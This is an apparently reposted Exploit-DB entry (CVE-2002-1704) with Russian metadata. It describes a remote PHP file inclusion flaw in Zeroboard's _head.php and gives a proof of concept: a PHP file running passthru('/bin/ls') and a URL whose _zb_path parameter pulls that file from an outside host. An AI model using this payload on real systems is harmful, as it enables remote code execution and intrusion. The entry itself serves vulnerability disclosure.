- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21557
- Проверка EDB
-
- Пройдено
- Автор
- ONLOOKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2002-1704
- Дата публикации
- 2002-06-15
Код:
source: https://www.securityfocus.com/bid/5028/info
Zeroboard is a PHP web board package available for the Linux and Unix platforms.
Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script.
PHP Source file a.php
<? passthru("/bin/ls"); ?>
Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a- Источник
- www.exploit-db.com
